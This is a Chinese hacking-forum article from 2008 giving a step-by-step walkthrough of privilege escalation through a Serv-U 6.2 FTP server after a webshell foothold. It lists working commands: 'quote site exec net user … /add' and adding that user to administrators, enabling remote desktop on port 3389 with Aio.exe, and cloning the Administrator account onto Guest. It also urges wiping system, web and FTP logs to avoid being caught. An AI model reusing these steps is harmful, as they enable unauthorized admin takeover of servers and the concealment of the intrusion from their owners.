基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 安全动画 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 脚本攻防 >> 文章正文
手工FTP提权
作者:admin    文章来源:转载    点击数:    更新时间:2008-7-7

 

开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个

wscript.shell √ 命令行执行组件

在看看这里 开了终端了 有时候没开也会显示3389

个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的

方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2

有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权

连得上 说明开着 (小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下)

接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的

我简单说明一下就好了 Add User 这里是添加 Del User 删除

RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了

FTP帐号 lake 密码 admin123

连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开

说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令

quote site exec net user shayu 83073645 /add添加用户

200 EXEC command successful (TID=33).

成功 继续添加权限

200 EXEC command successful (TID=33) OK了

服务器的3389已经被我开过了 我简单演示一下怎么开就OK了

用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了

集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去

现在看操作 我用工具传过去比较方便点

命令 quote site exec Aio.exe -Terminal 3389

在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以

OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接

登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了

走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽

清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了

就到这里 88咯

相关命令:

Aio.exe -Clone Administrator Guest 83073645

Aio.exe -Terminal 3389

ftp提权命令:quote site exec net user shayu 83073645 /add

quote site exec net localgroup administrators shayu /add

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章:
  • 最近更新
    推荐文章防网游盗号通用方案
    推荐文章XP下包括各项最完整最
    推荐文章加密免杀你asp马
    推荐文章内网渗透---常用手法
    推荐文章介绍几个杀毒软件与防
    推荐文章SQL提权演示
    推荐文章SQL注射修改难猜解的M
    推荐文章靠网民输错域名 每天1
    推荐文章漫谈局域网中的限制与
    推荐文章木马万能查杀清除方法
    热门文章
    推荐文章利用社会工程学拿下五
    推荐文章QQ十大使用秘笈大公开
    推荐文章网管和黑客都必须知道
    推荐文章Tomcat弱口令到拿下服
    推荐文章帮你找回被盗的QQ,11个
    普通文章玩转网吧hack
    推荐文章3389密码的嗅探实例
    普通文章让你的QQ飞起来,卸了Q
    推荐文章菜鸟必看:小心,QQ就
    普通文章网管必知:电脑所有密码
    相关文章
    做精明的赶马人:木马查找
    卡巴斯基2009新版测试报
    CGI Hack与Webshell研究
    防网游盗号通用方案
    利用Windows 磁盘配额使
    用GOOGLE让你瞬间变身专
    趋势CEO:病毒产业糟糕透
    SuperCMS管理系统SQL注入
    扫不出135的一些原因整理
    站长如何用EBAY做英文流
    关于服务器被批量挂马的
    详述破解技术中的暴力破
    SQL数据库超级管理员账号
    拿WebShell的经验
    实战PHP网站系统权限
    网速慢的原因及解决办法
    记一次艰难的FTP提权
    美国花旗银行自动取款机
    XP下包括各项最完整最齐
    加密免杀你asp马
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号